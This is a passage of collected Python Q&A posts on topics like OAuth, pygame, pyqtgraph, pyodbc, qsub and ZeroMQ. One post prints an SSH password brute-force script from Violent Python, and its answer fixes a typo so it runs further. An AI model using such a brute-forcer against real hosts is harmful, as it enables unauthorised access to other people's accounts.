around a new table.
I am not quite sure if my code is correct cause I am surprised how small the
final number of tables are.
I would be happy if somebody could say if the implementation is correct and if
so are there any possible improvements.
import numpy as np
def CRP(alpha,N):
"""Chinese Restaurant Process with alpha as concentration parameter and N
the number of sample"""
#Array which will save for each i, the number of people people sitting
#until table i
summed=np.ones(1) #first person assigned to the first table
for i in range(1,N):
#A loop that assigns the people to tables
#randind represent the random number from the interval [1,i-1+alpha]
randind=(float(i)+alpha)*np.random.uniform(low=0.0, high=1.0, size=1)
#update is the index for the table that the person should be placed which
#if greater than the total number, will be placed in a new table
update=np.searchsorted(summed,randind,side='left')
if randind>i:
summed=np.append(summed,i+1)
else:
zerovec=np.zeros(update)
onevec=np.ones(summed.size-update)
summed+=np.append(zerovec,onevec)
#This part converts summed array to tables array which indicates the number
#of persons assigned to that table
tables=np.zeros(summed.size)
tables[0]=summed[0]
for i in range(1,summed.size):
tables[i]=summed[i]-summed[i-1]
return tables
a=CRP(0.9999,1000)
print a
Answer: Suggestion. Forget about the code you have written. Construct declarative
tests of the code. By taking that approach, you start with examples for which
you know the correct answer. That would have answered Brainiac's question, for
example.
Then write your program. You will likely find that if you start approaching
problems this way, you may create sub-problems first, for which you can also
write tests. Until they all pass, there is no need to rush on to the full
problem.
|
Sample of Server to Server authentication using OAuth 2.0 with Google API's
Question: This is a follow-up question for [this
question](http://stackoverflow.com/questions/19391252/how-to-obtain-a-private-
key-for-a-legacy-google-app-engine-project):
I have successfully created a private key and have read the various pages of
Google documentation on the concepts of server to server authentication.
I need to create a JWT to authorize my App Engine application (Python) to
access the Google calendar and post events in the calendar. From the source in
`oauth2client` it looks like I need to use
`oauth2client.client.SignedJwtAssertionCredentials` to create the JWT.
What I'm missing at the moment is a stylised bit of sample Python code of the
various steps involved to create the JWT and use it to authenticate my App
Engine application for Google Calendar. Also, from
`SignedJwtAssertionCredentials` source it looks like I need some App Engine
compatible library to perform the signing.
Can anybody shed some light on this?
Answer: After some digging I found a [couple of
samples](https://code.google.com/p/google-api-python-
client/source/browse/#hg/samples/service_account) based on the OAuth2
authentication. From this I cooked up the following simple sample that creates
a JWT to access the calendar API:
import httplib2
import pprint
from apiclient.discovery import build
from oauth2client.client import SignedJwtAssertionCredentials
# Get the private key from the Google supplied private key file.
f = file("your_private_key_file.p12", "rb")
key = f.read()
f.close()
# Create the JWT
credentials = SignedJwtAssertionCredentials(
"[email protected]", key,
scope="https://www.googleapis.com/auth/calendar"
)
# Create an authorized http instance
http = httplib2.Http()
http = credentials.authorize(http)
# Create a service call to the calendar API
service = build("calendar", "v3", http=http)
# List all calendars.
lists = service.calendarList().list(pageToken=None).execute(http=http)
pprint.pprint(lists)
For this to work on Google App Engine you will need to enable PyCrypto for
your app. This means adding the following to your `app.yaml` file:
libraries:
- name: pycrypto
version: "latest"
|
Send by ref/by ptr in python?
Question: i need help-i try to send value to method like in c++ by ref/by ptr how can i
do it?
to exmple:
def test(x):
x=3
x=2
test(x)
print(x)
In this case x a local variable in test method and will not change the
"original" X so how can i change the "original" X? thanks
Answer: In some ways, all calls in Python are called with references. In fact, all
variables are references in a sense. But some types, like `int` from your
example, cannot be changed.
In the case of, say, a `list`, the functionality you're looking for is
trivial:
def change_it(some_list):
some_list.append("world")
foo = ["hello"]
change_it(foo)
print(foo) # prints ['hello', 'world']
Note, however, that reassigning the _parameter_ variable `some_list` does not
change the value in the calling context.
If you're asking this question, though, you're probably looking to do
something like set two or three variables using one function. In that case,
you're looking for something like this:
def foo_bar(x, y, z):
return 2*x, 3*y, 4*z
x = 3
y = 4
z = 5
x, y, z = foo_bar(x, y, z)
print(y) # prints 12
Of course, you can do anything in Python, but that doesn't mean you should. In
the fashion of the TV show Mythbusters, here's something that does what you're
looking for
import inspect
def foo(bar):
frame = inspect.currentframe()
outer = inspect.getouterframes(frame)[1][0]
outer.f_locals[bar] = 2 * outer.f_locals[bar]
a = 15
foo("a")
print(a) # prints 30
or even worse:
import inspect
import re
def foo(bar):
# get the current call stack
my_stack = inspect.stack()
# get the outer frame object off of the stack
outer = my_stack[1][0]
# get the calling line of code; see the inspect module documentation
# only works if the call is not split across multiple lines of code
calling_line = my_stack[1][4][0]
# get this function's name
my_name = my_stack[0][3]
# do a regular expression search for the function call in traditional form
# and extract the name of the first parameter
m = re.search(my_name + "\s*\(\s*(\w+)\s*\)", calling_line)
if m:
# finally, set the variable in the outer context
outer.f_locals[m.group(1)] = 2 * outer.f_locals[m.group(1)]
else:
raise TypeError("Non-traditional function call. Why don't you just"
" give up on pass-by-reference already?")
# now this works like you would expect
a = 15
foo(a)
print(a)
# but then this doesn't work:
baz = foo_bar
baz(a) # raises TypeError
# and this *really*, disastrously doesn't work
a, b = 15, 20
foo_bar, baz = str, foo_bar
baz(b) and foo_bar(a)
print(a, b) # prints 30, 20
Please, _please_ , _**please**_ , don't do this. I only put it in here to
inspire the reader to look into some of the more obscure parts of Python.
|
function calls in python (pygame)
Question: im trying to split my code into functions and i want to input my own values
for x and y. so the character can move from the inputed values. When i try to
do this from the function call, nothing happens.
Any suggestions?
import pygame, sys
from pygame.locals import *
pygame.init()
width,height=(842,595)
screen = pygame.display.set_mode((width,height),0,32)
pygame.display.set_caption("game")
man = pygame.image.load("man.png")
target = pygame.image.load("star.png")
#setting a background image
bgimage= pygame.image.load("background.jpg")
##image for the jupiter object
another_target = pygame.image.load("jupiter.gif")
x = 100
y = height-300
another_targetx = 400
another_targety = 500
#allows movement whilst holding down key.
clock= pygame.time.Clock()
def move(x,y):
movingX =0
movingY =0
speedX =0
speedY=0
while True:
pygame.display.update()
for event in pygame.event.get():
if event.type==QUIT:
pygame.quit()
sys.exit()
elif event.type==KEYDOWN:
if event.key ==K_LEFT:
x-=5
elif event.key==K_RIGHT:
x+=5
elif event.key==K_UP:
y-=5
elif event.key==K_DOWN:
y+=5
time_Passed=clock.tick(25)
time_elapsed_seconds=time_Passed/1000.0
distanceX = time_elapsed_seconds*speedX
movingX+=distanceX
distanceY=time_elapsed_seconds*speedY
movingY+=distanceY
x+=movingX
y+=movingY
clock.tick(50)
pygame.display.update()
move(x,y)
screen.blit(bgimage,(0,0))
screen.blit(man, (x,y))
screen.blit( another_target,( another_targetx, another_targety))
screen.blit(target,(200,400))
pygame.display.update()
Answer: You have an infinite loop within the command `move(x, y)`. The stuff on the
outside of this loop which updates the screen is never reached, so nothing
ever appears to happen. Try putting everything after the command definition
into the `while True` loop inside the command.
|
Python 3.3 pyqtgraph can't plot points
Question: Is it me, or is it impossible to plot points (scatterplot) in pyqtgraph using
Python 3.3?
I have quite big data*, and find matplotlib way too slow, so I would like to
give this a try:
1) `pyqtgraph.plot([1],[1])` shows nothing in the plot.
2) `pyqtgraph.plot([1,2,3,4], [1,2,3,4])` shows a line connecting the dots
3) `pyqtgraph.plot([1,2,3,4], [1,2,3,4], pen=None)` as suggested by docs,
errors**
4) `pyqtgraph.ScatterPlotItem()` does not exist.
I do not know what to try anymore... Did anyone get this working and would be
willing to share code?
* * *
* I am aware of the irony with the data I present, forgive me.
** TypeError: unsupported operand type(s) for -: 'NoneType' and 'NoneType'.
*** Perhaps unrelated, but I also can't get the examples to run (Ubuntu
13.04).
Answer: The correct ways to create a scatter plot are either by specifying the symbol
properties when plotting (symbol, symbolPen, symbolBrush, symbolSize; see the
[PlotDataItem
API](http://pyqtgraph.org/documentation/graphicsItems/plotdataitem.html#pyqtgraph.PlotDataItem.__init__)):
pg.plot([1,2,3,4], [1,2,3,4], pen=None, symbol='o')
Or by directly creating a ScatterPlotItem, which seems to exist on my end:
>>> import pyqtgraph as pg
>>> pg.ScatterPlotItem
<class 'pyqtgraph.graphicsItems.ScatterPlotItem.ScatterPlotItem'>
See `examples/ScatterPlot.py` on how to use the latter method.
|
Generating Pivot Tables in Python - Pandas? Numpy? Xlrd? from csv
Question: I have been searching for hours, literally the entire day on how to generate a
pivot table in Python. I am very new to python so please bear with me.
What I want is to take a csv file, extract the first column and generate a
pivot table using the count or frequency of the numbers in that column, and
sort descending
import pandas
import numpy
from numpy import recfromtxt
a = recfromtxt('1.csv', skiprows=1, usecols=0, delimiter=',')
print a
^ what i get here is a list of the first column [2 2 2 6 7]
What i need is an export of 2 columns
2--3
6--1
7--1
Answer: Have you had a look here?
<https://pypi.python.org/pypi/pivottable>
Otherwise, from you example, you might just use list comprehensions:
>>> l = [2,2,2,6,7]
>>> [(i, l.count(i)) for i in set(l)]
[
(2,3),
(6,1),
(7,1)
]
Or even dictionary comprehensions, depending on what you need:
>>> l = [2,2,2,6,7]
>>> {i:l.count(i) for i in set(l)}
{
2: 3,
6: 1,
7: 1
}
**edit** (suggestions from @Peter DeGlopper)
Another more efficient way using
[collections.Counter](http://docs.python.org/2/library/collections.html#counter-
objects) (read comments below):
>>> from collections import Counter
>>> l = [2,2,2,6,7]
>>> Counter(l)
Counter({2: 3, 6: 1, 7: 1})
|
How to install external packages into Canopy?
Question: I am new to python and Canopy. I have searched for the possible solutions
online, including the support forum of Enthought Canopy, but failed to solve
my problem by following the instructions under other similar questions.
I use Mac OS, and wanted to install external python packages to my Enthought
Canopy (specifically, a new package named "ggplot"
(<https://github.com/yhat/ggplot/>)).
The instructions on the support forum of Enthought
(<https://support.enthought.com/entries/23389761-Installing-packages-into-
Canopy-Python-from-the-command-line>) said " follow standard Python
installation procedures from the OS command line ". However, I could only
install this package to my previous python library (system default python).
When I want to import this module in Canopy, it failed. I thought I might need
to change the installation path in order to install this package in Canopy,
but not sure how to change and where to change.
When I want to use Sublime text to run my scripts when I set Enthought as
default python env, it succeeded so I guess it still imported the package from
my previous python library. How can I know which environment the editor is
currently using?
Thanks!
Answer: 1) The cited article links to [another
article](https://support.enthought.com/entries/23646538-Make-Canopy-s-Python-
be-your-default-Python-i-e-on-the-PATH-), which describes how to make Canopy
Python be the default python, and states that the easiest way is simply to use
the Canopy Preferences dialog to make Canopy be your default Python.
If you prefer not to do that, the article suggests that you modify the PATH
environment variable (note that this is not actually an "installation path"
but a more general path used for locating programs to run for any reason.)
So I'm guessing that you don't know how to do this? Here's a simple way. From
a terminal, type the following (substituting your own user name) before
continuing with the installation:
` export PATH=/Users/your-user-
name/Library/Enthought/Canopy_64bit/User/bin:${PATH} `
2) To find out what environment your editor is using, run the following
program:
import sys
print sys.prefix
|
Print output to file on python
Question: I have two python files. My test.py import td.py file witch i found internet.
Td.py file looking signals from TelldusCenter program.
Now if i run test.py file it shows me signals what i get from TelldusCenter
app and output is something like: "Door - ON" Now i like to print that "Door -
ON" text to file but i dont know how.
Here is my test.py file
#!/usr/bin/env python
import td
import time
def myDeviceEvent(deviceId, method, data, callbackId):
print '%s' %( td.getName(deviceId) )+' - %s' %(td.methodsReadable.get(method, 'Unknown' ))
td.registerDeviceEvent(myDeviceEvent)
try:
while(1):
time.sleep(1)
except KeyboardInterrupt:
print 'KeyboardInterrupt received, exiting'
"td.registerDeviceEvent(myDeviceEvent)" print output to terminal now. I try to
print that to file but it just give me error.
a = open("output.txt", "w")
a.write(td.registerDeviceEvent(myDeviceEvent))
> Traceback (most recent call last): File "testi.py", line 11, in
> a.write(td.registerDeviceEvent(myDeviceEvent)) TypeError: expected a
> character buffer object
Answer: From my interpretation of the code, `td.registerDeviceEvent(myDeviceEvent)`
registers a callback. It does not produce a string itself. This is why you
cannot output the 'result' of the registration.
Instead try this:
#!/usr/bin/env python
import td
import time
a = open("output.txt", "w")
def myDeviceEvent(deviceId, method, data, callbackId):
a.write('%s' %( td.getName(deviceId) ) + ' - %s' %(td.methodsReadable.get(method, 'Unknown')
td.registerDeviceEvent(myDeviceEvent)
|
Python: fast iteration through file
Question: I need to iterate through two files many million times, counting the number of
appearances of word pairs throughout the files. (in order to build contingency
table of two words to calculate Fisher's Exact Test score)
I'm currently using
from itertools import izip
src=tuple(open('src.txt','r'))
tgt=tuple(open('tgt.txt','r'))
w1count=0
w2count=0
w1='someword'
w2='anotherword'
for x,y in izip(src,tgt):
if w1 in x:
w1count+=1
if w2 in y:
w2count+=1
.....
While this is not bad, I want to know if there is any faster way to iterate
through two files, hopefully significantly faster.
I appreciate your help in advance.
Answer: I still don't quite get what exactly you are trying to do, but here's some
example code that might point you in the right direction.
We can use a dictionary or a `collections.Counter` instance to count all
occurring words and pairs _in a single pass_ through the files. After that, we
only need to query the in-memory data.
import collections
import itertools
import re
def find_words(line):
for match in re.finditer("\w+", line):
yield match.group().lower()
counts1 = collections.Counter()
counts2 = collections.Counter()
counts_pairs = collections.Counter()
with open("src.txt") as f1, open("tgt.txt") as f2:
for line1, line2 in itertools.izip(f1, f2):
words1 = list(find_words(line1))
words2 = list(find_words(line2))
counts1.update(words1)
counts2.update(words2)
counts_pairs.update(itertools.product(words1, words2))
print counts1["someword"]
print counts1["anotherword"]
print counts_pairs["someword", "anotherword"]
|
AttributeError: '_BoundedSemaphore' object has no attribute 'acuire'
Question: I am learning python, and learning through a book called Violent Python, I am
on a section which involves making a brute force SSH script. I am having
problems with an error, and cannot figure out the problem or the fix.
the code:
import pxssh
import optparse
import time
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0
def connect(host, user, password, release):
global Found
global Fails
try:
s= pxssh.pxssh()
s.login(host, user, password)
print '[+] Password Found: ' + password
Found = True
except Exception, e:
if 'read_nonblocking' in str(e):
Fails += 1
time.sleep(5)
connect(host, user, password, False)
elif 'synchronize with original prompt' in str(e):
time.sleep(1)
connect(host, user, password, False)
finally:
if release: connection_lock.release()
def main():
parser = optparse.OptionParser('usage%prog ' + \
'-H <target host> -u <user> -F <password list>')
parser.add_option('-H', dest='tgtHost', type='string', \
help='target host')
parser.add_option('-F', dest='passwdFile', type='string', \
help='specify password file')
parser.add_option('-u', dest='user', type='string', \
help='the user')
(options, args) = parser.parse_args()
host = options.tgtHost
passwdFile = options.passwdFile
user = options.user
if host == None or passwdFile == None or user == None:
print parser.usage
exit(0)
fn = open(passwdFile, 'r')
for line in fn.readlines():
if Found:
print "[*] Exiting: Password Found"
exit(0)
if Fails > 5:
print "[!] Exiting: Too Many Socket Timeouts"
exit(0)
connection_lock.acuire()
password = line.strip('\r').strip('\n')
print "[-] Testing: "+str(password)
t = Tread(target=connect, args=(host, user, password, true))
child = t.start()
if __name__ == '__main__':
main()
this is the error I get:
[root@test ~]# python2.7 test5.py -H x.x.x.x -u root -F pass.txt
Traceback (most recent call last):
File "test5.py", line 70, in <module>
main()
File "test5.py", line 64, in main
connection_lock.acuire()
AttributeError: '_BoundedSemaphore' object has no attribute 'acuire'
I have edited out the actual host x.x.x.x but the host I am using is up and
live. any help understanding this error and a fix would be helpful.
Answer: You simply have a typo; the line should be
connection_lock.acquire()
# ^
|
Is there a python http-client which automatically performs authentication for several auth types?
Question: I am currently using urllib2 or curl to perform authentication to different
Trac, Jira, Twiki and Media Wiki sites to request information like the users
that are active.
Now depending on the settings on the specific instance I currently need to
specify how to perform the authentication (e.g. trac uses either Basic or
Digest auth scheme).
Is there a (python) library or a piece of code that automatically identifies
the server's auth scheme and performs given url, username, and password to
eliminate this server-specific setting as a constant source of error?
Answer: Python Requests don't handle authentication scheme automatically but provides
a simpler interface to handle both Basic and Digest.
Check <http://www.python-requests.org/en/latest/user/authentication/> for code
examples.
The code below try to get the url once to get the authentication scheme, then
retry the url with the correct Auth implementation:
import requests
import sys
from requests.auth import HTTPBasicAuth, HTTPDigestAuth
AUTH_MAP = {
'basic': HTTPBasicAuth,
'digest': HTTPDigestAuth,
}
def auth_get(url, *args, **kwargs):
r = requests.get(url)
if r.status_code != 401:
return r
auth_scheme = r.headers['WWW-Authenticate'].split(' ')[0]
auth = AUTH_MAP.get(auth_scheme.lower())
if not auth:
raise ValueError('Unknown authentication scheme')
r = requests.get(url, auth=auth(*args, **kwargs))
return r
if __name__ == '__main__':
print auth_get(*sys.argv[1:])
Test it with `python test_request.py username password`.
|
BeautifulSoup - why is it printing file path and not the content
Question: I am trying to understand how BeautifulSoup works. Note that I am really new
to Python so I am probably missing something out.
I open a Python terminal and write this:
from bs4 import BeautifulSoup
import re
ytchannel = '/home/XXX/Documents/test2'
soup = BeautifulSoup(ytchannel)
print(soup.prettify())
This is what I get:
<html>
<body>
<p>
/home/XXX/Documents/test2
</p>
</body>
</html>
Why? It makes no sense to me. I just want the content of `test2`. I am writing
exactly what is written on the BeautifulSoup website.
Answer: You passed a string to `BeautifulSoup()`; sure it is a filename, but
`BeautifulSoup()` does not open filenames for you. It operates on strings or
open file-objects only.
Open the file first; `BeautifulSoup()` will read file objects if you pass
those in:
with open(ytchannel) as infile:
soup = BeautifulSoup(infile)
See [Making the
soup](http://www.crummy.com/software/BeautifulSoup/bs4/doc/#making-the-soup).
|
Python data structure for sorted key-value pairs
Question: I have a (fixed) set of keys for which I store a value. I often look up the
value for a key and increment or decrement it. A typical dict usage.
x = {'a': 1, 'b': 4, 'c': 3}
x['a'] += 1
Additionally however, just as often as incrementing or decrementing values, I
also need to know the key for the i-th largest (or smallest) value. Of course
I can do the sorting:
s = sorted(x, key=lambda k:(x[k],k))
s[1] == 'c'
The problem is sorting every time seems rather expensive. Especially because I
only increment one item in between sorts. I feel that I could use another data
structure better suited for this. A tree perhaps?
Answer: You could use blist's sorteddict to keep the values in order. Here's a quick
implementation of a dictionary which, when iterated over, returns its keys in
order of its values (not really tested intensively):
import collections
from blist import sorteddict
class ValueSortedDict(collections.MutableMapping):
def __init__(self, data):
self._dict = {}
self._sorted = sorteddict()
self.update(data)
def __getitem__(self, key):
return self._dict[key]
def __setitem__(self, key, value):
# remove old value from sorted dictionary
if key in self._dict:
self.__delitem__(key)
# update structure with new value
self._dict[key] = value
try:
keys = self._sorted[value]
except KeyError:
self._sorted[value] = set([key])
else:
keys.add(key)
def __delitem__(self, key):
value = self._dict.pop(key)
keys = self._sorted[value]
keys.remove(key)
if not keys:
del self._sorted[value]
def __iter__(self):
for value, keys in self._sorted.items():
for key in keys:
yield key
def __len__(self):
return len(self._dict)
x = ValueSortedDict(dict(a=1, b=4, c=3))
x['a'] += 1
print list(x.items())
x['a'] += 10
print list(x.items())
x['d'] = 4
print list(x.items())
This gives:
[('a', 2), ('c', 3), ('b', 4)]
[('c', 3), ('b', 4), ('a', 12)]
[('c', 3), ('b', 4), ('d', 4), ('a', 12)]
|
Running tests for third-party Django app results in "ImportError: No module named urls"
Question: I've installed a not-yet-open sourced third-party Django app using pip and now
I'm implementing unit tests for it. However, whenever I try running the unit
tests, it results in the following traceback for each test case:
ERROR: test_form_page_loads (myapp.tests.tests.ViewTests)
----------------------------------------------------------------------
Traceback (most recent call last):
File "/home/yiqing/repos/dotfiles/common/virtualenvwrapper_hooks/filer_demo/local/lib/python2.7/site-packages/sampling/tests/tests.py", line 47, in test_form_page_loads
response = self.client.get(self.form_url)
File "/home/yiqing/repos/dotfiles/common/virtualenvwrapper_hooks/filer_demo/local/lib/python2.7/site-packages/django/test/client.py", line 453, in get
response = super(Client, self).get(path, data=data, **extra)
File "/home/yiqing/repos/dotfiles/common/virtualenvwrapper_hooks/filer_demo/local/lib/python2.7/site-packages/django/test/client.py", line 271, in get
parsed = urlparse(path)
File "/usr/lib/python2.7/urlparse.py", line 135, in urlparse
tuple = urlsplit(url, scheme, allow_fragments)
File "/usr/lib/python2.7/urlparse.py", line 168, in urlsplit
cached = _parse_cache.get(key, None)
File "/home/yiqing/repos/dotfiles/common/virtualenvwrapper_hooks/filer_demo/local/lib/python2.7/site-packages/django/utils/functional.py", line 156, in __hash__
return hash(self.__cast())
File "/home/yiqing/repos/dotfiles/common/virtualenvwrapper_hooks/filer_demo/local/lib/python2.7/site-packages/django/utils/functional.py", line 139, in __cast
return self.__bytes_cast()
File "/home/yiqing/repos/dotfiles/common/virtualenvwrapper_hooks/filer_demo/local/lib/python2.7/site-packages/django/utils/functional.py", line 135, in __bytes_cast
return bytes(func(*self.__args, **self.__kw))
File "/home/yiqing/repos/dotfiles/common/virtualenvwrapper_hooks/filer_demo/local/lib/python2.7/site-packages/django/core/urlresolvers.py", line 496, in reverse
return iri_to_uri(resolver._reverse_with_prefix(view, prefix, *args, **kwargs))
File "/home/yiqing/repos/dotfiles/common/virtualenvwrapper_hooks/filer_demo/local/lib/python2.7/site-packages/django/core/urlresolvers.py", line 382, in _reverse_with_prefix
possibilities = self.reverse_dict.getlist(lookup_view)
File "/home/yiqing/repos/dotfiles/common/virtualenvwrapper_hooks/filer_demo/local/lib/python2.7/site-packages/django/core/urlresolvers.py", line 297, in reverse_dict
self._populate()
File "/home/yiqing/repos/dotfiles/common/virtualenvwrapper_hooks/filer_demo/local/lib/python2.7/site-packages/django/core/urlresolvers.py", line 263, in _populate
for pattern in reversed(self.url_patterns):
File "/home/yiqing/repos/dotfiles/common/virtualenvwrapper_hooks/filer_demo/local/lib/python2.7/site-packages/django/core/urlresolvers.py", line 347, in url_patterns
patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
File "/home/yiqing/repos/dotfiles/common/virtualenvwrapper_hooks/filer_demo/local/lib/python2.7/site-packages/django/core/urlresolvers.py", line 342, in urlconf_module
self._urlconf_module = import_module(self.urlconf_name)
File "/home/yiqing/repos/dotfiles/common/virtualenvwrapper_hooks/filer_demo/local/lib/python2.7/site-packages/django/utils/importlib.py", line 35, in import_module
__import__(name)
ImportError: No module named urls
Here's the directory structure of this app, in case it's relevant:
myapp/
├── admin.py
├── conf.py
├── forms.py
├── __init__.py
├── models.py
├── templates
├── tests
│ ├── __init__.py
│ ├── models.py
│ ├── settings.py
│ └── tests.py
├── urls.py
└── views.py
Answer: Turns out I needed to create a `urls.py` with root url conf-like settings
inside of `myapp/tests/`.
|
Submitting jobs using python
Question: I am trying to submit a job in a cluster in our institute using python
scripts.
compile_cmd = 'ifort -openmp ran_numbers.f90 ' + fname \
+ ' ompscmf.f90 -o scmf.o'
subprocess.Popen(compile_cmd, shell=True)
Popen('qsub launcher',shell=True)
The problem is that , system is hanging at this point. Any obvious mistakes in
the above script? All the files mentioned in the code are available in that
directory ( I have cross checked that). _qsub_ is a command used to submit
jobs to our cluster. _fname_ is the name of a file that I created in the
process.
Answer: I have a script that I used to submit multiple jobs to our cluster using qsub.
qsub typically takes job submissions in the form
qsub [qsub options] job
In my line of work, job is typically a bash (.sh) or python script (.py) that
actually calls the programs or code to be run on each node. If I wanted to
submit a job called "test_job.sh" with maximum walltime, I would do
qsub -l walltime=72:00:00 test_job.sh
This amounts to the following python code
from subprocess import call
qsub_call = "qsub -l walltime=72:00:00 %s"
call(qsub_call % "test_job.sh", shell=True)
* * *
Alternatively, what if you had a bash script that looked like
#!/bin/bash
filename="your_filename_here"
ifort -openmp ran_numbers.f90 $filename ompscmf.f90 -o scmf.o
then submitted this via `qsub job.sh`?
* * *
**Edit:** Honestly, the most optimal job queueing scheme varies from cluster
to cluster. One simple way to simplify you job submissions scripts is to find
out how many CPUs are available at each node. Some of the more recent queueing
systems allow you to submit many single CPU jobs and they will submit these
together on as few nodes as possible; however, some older clusters won't do
that and submitting many individual jobs is frowned upon.
Say that each node in your cluster has 8 CPUs. You could write you script like
#!/bin/bash
#PBS -l nodes=1;ppn=8
for ((i=0; i<8; i++))
do
./myjob.sh filename_${i} &
done
wait
What this will do is submit 8 jobs on one node at once (`&` means do in
background) and wait until all 8 jobs are finished. This may be optimal for
clusters with many CPUs per node (for example, one cluster that I used has 48
CPUs per node).
Alternatively, if submitting many single core jobs is optimal and your
submission code above isn't working, you could use python to generate bash
scripts to pass to qsub.
#!/usr/bin/env python
import os
from subprocess import call
bash_lines = ['#!/bin/bash\n', '#PBS -l nodes=1;ppn=1\n']
bash_name = 'myjob_%i.sh'
job_call = 'ifort -openmp ran_numbers.f90 %s ompscmf.f90 -o scmf.o &\n'
qsub_call = 'qsub myjob_%i.sh'
filenames = [os.path.join(root, f) for root, _, files in os.walk(directory)
for f in files if f.endswith('.txt')]
for i, filename in enumerate(filenames):
with open(bash_name%i, 'w') as bash_file:
bash_file.writelines(bash_lines + [job_call%filename, 'wait\n'])
call(qsub_call%i, shell=True)
|
Using SELECT LAST() with pyodbc and MSACCESS sometimes returns same value
Question: I have a strange problem that Im having trouble both duplicating and solving.
Im using the pyodbc library in Python to access a MS Access 2007 database. The
script is basically just importing a csv file into Access plus a few other
tricks.
I am trying to first save a 'Gift Header' - then get the auto-incrmented id
(GiftRef) that it is saved with - and use this value to save 1 or more
associated 'Gift Details'.
Everything works exactly as it should - 90% of the time. The other 10% of the
time Access seems to get stuck and repeatedly returns the same value for
cur.execute("select last(GiftRef) from tblGiftHeader").
Once it gets stuck it returns this value for the duration of the script. It
does not happen while processing a specific entry or at any specific time in
the execution - it seems to happen completely at random.
Also I know that it is returning the wrong value - in other words the Gift
Headers **are** being saved - and are being given new, unique ID's - but for
whatever reason that value is not being returned correctly when called.
SQL = "insert into tblGiftHeader (PersonID, GiftDate, Initials, Total) VALUES "+ str(header_vals) + ""
cur.execute(SQL)
gift_ref = [s[0] for s in cur.execute("select last(GiftRef) from tblGiftHeader")][0]
cur.commit()
Any thoughts or insights would be appreciated.
Answer: In Access SQL the `LAST()` function does not _necessarily_ return the most
recently created AutoNumber value. (See [here](http://office.microsoft.com/en-
ca/access-help/first-last-functions-HP001032232.aspx) for details.)
What you want is to do a `SELECT @@IDENTITY` immediately after you commit your
INSERT, like this:
import pyodbc
cnxn = pyodbc.connect('DRIVER={Microsoft Access Driver (*.mdb, *.accdb)};DBQ=C:\\Users\\Public\\Database1.accdb;')
cursor = cnxn.cursor()
cursor.execute("INSERT INTO Clients (FirstName, LastName) VALUES (?, ?)", ['Mister', 'Gumby'])
cursor.commit()
cursor.execute("SELECT @@IDENTITY AS ID")
row = cursor.fetchone()
print row.ID
cnxn.close()
|
capture Python script output
Question: I have written very small script and try to capture output of the script. I
have written multiple time similar way but never had issue. Could I have
input. I think I am doing very silly mistake
numpy_temp = """
import numpy
import sys
a, b, c = numpy.polyfit(%s,%s, 2)
print a, b, c""" %(x, y)
fp_numpy = open("numpy_temp.py", "w")
fp_numpy.write(numpy_temp)
cmd = "/remote/Python-2.7.2/bin/python numpy_temp.py "
proc = subprocess.Popen(cmd, stdout = subprocess.PIPE,
stderr = subprocess.PIPE, shell = True)
out, err = proc.communicate()
print "out", out
Answer: You're never actually closing `fp_numpy`, so the script can be empty or
incomplete at the time you try to run it.
It isn't _guaranteed_ to be empty, but it's very _likely_. When I try this on
two different *nix computers with 7 different versions of Python, it's empty
every time… (The fact that, after your script finishes, the file gets closed,
and therefore flushed, makes the problem harder to debug.)
The best way to fix this is to use a `with` statement, so it's impossible to
forget to close the file:
with open("numpy_temp.py", "w") as fp_numpy:
fp_numpy.write(numpy_temp)
* * *
But beyond that, you've got another problem. If the generated script raises an
exception, it will print nothing to stdout, and will dump a traceback to
stderr, which you will read and ignore. It's very hard to debug problems when
you're ignoring the errors… I don't know what you're passing for `x` and `y`,
but if you're, say, passing a `numpy.array` instead of a string that evaluates
to one, you could easily get an exception and never see it. Either send stderr
to stdout, or `print "err", err` at the end.
And finally, you really shouldn't be using a command string and `shell=True`
here, because you end up with an extra level of indirection for no good
reason, which can _also_ make things harder to debug. Just do this:
cmd = ["/remote/Python-2.7.2/bin/python", "numpy_temp.py"]
proc = subprocess.Popen(cmd, stdout = subprocess.PIPE,
stderr = subprocess.PIPE)
|
Trimmed Mean with Percentage Limit in Python?
Question: I am trying to calculate the **trimmed mean** , which excludes the outliers,
of an array.
I found there is a module called
[`scipy.stats.tmean`](http://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.tmean.html#scipy.stats.tmean),
but it requires the user specifies the **range by absolute value instead of
percentage values**.
In Matlab, we have [`m =
trimmean(X,percent)`](http://www.mathworks.com/help/stats/trimmean.html), that
does exactly what I want.
**Do we have the counterpart in Python?**
Answer: At least for scipy v0.14.0, there is a dedicated (but undocumented?) function
for this:
from scipy import stats
m = stats.trim_mean(X, 0.1) # Trim 10% at both ends
which used
[`stats.trimboth`](http://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.trimboth.html)
inside.
|
how to change the secs to the ISO time format?
Question: How to change the secs to the ISO time format:
for example:
28800 sec is the offset from the midnight? if successfully converted, the
output should be 08:00:00 not 8:00:00.
How could I do it in python? Thank you.
Answer: Solution using timedelta to 'do the math'
from datetime import datetime, timedelta
# Can easily get the values for today programmatically
# but ommitted here for brevity
midnight = datetime(2013, 10, 18)
delta = timedelta(seconds=28800)
offset_time = midnight + delta
print offset_time.strftime('%H:%M:%S')
>>> 08:00:00
|
ZeroMQ: have to sleep before send
Question: I'm write a zeromq demo with Forwarder device (with pyzmq)
Here are the codes(reference to <https://learning-0mq-with-
pyzmq.readthedocs.org/en/latest/pyzmq/devices/forwarder.html> ):
forwarder.py
import zmq
context = zmq.Context()
frontend = context.socket(zmq.SUB)
frontend.bind('tcp://*:5559')
frontend.setsockopt(zmq.SUBSCRIBE, '')
backend = context.socket(zmq.PUB)
backend.bind('tcp://*:5560')
zmq.device(zmq.FORWARDER, frontend, backend)
sub.py
import zmq
context = zmq.Context()
socket = context.socket(zmq.SUB)
socket.connect('tcp://localhost:5560')
socket.setsockopt(zmq.SUBSCRIBE, '')
while True:
print socket.recv()
pub.py
import zmq, time
context = zmq.Context()
socket = context.socket(zmq.PUB)
socket.connect('tcp://localhost:5559')
# time.sleep(0.01)
socket.send('9 hahah')
I run `python forwarder.py`, `python sub.py` in the terminal
then run `python pub.py`, the subscriber can't get the message. However, if I
sleep a little time(for example 0.01s) before send, it works.
So my problem is, why have I `sleep` before send? thanks.
Answer: It's known as [Slow Joiner](http://zguide.zeromq.org/page%3aall#Getting-the-
Message-Out) syndrome. Read the
[guide](http://zguide.zeromq.org/page%3aall#Getting-the-Message-Out), there
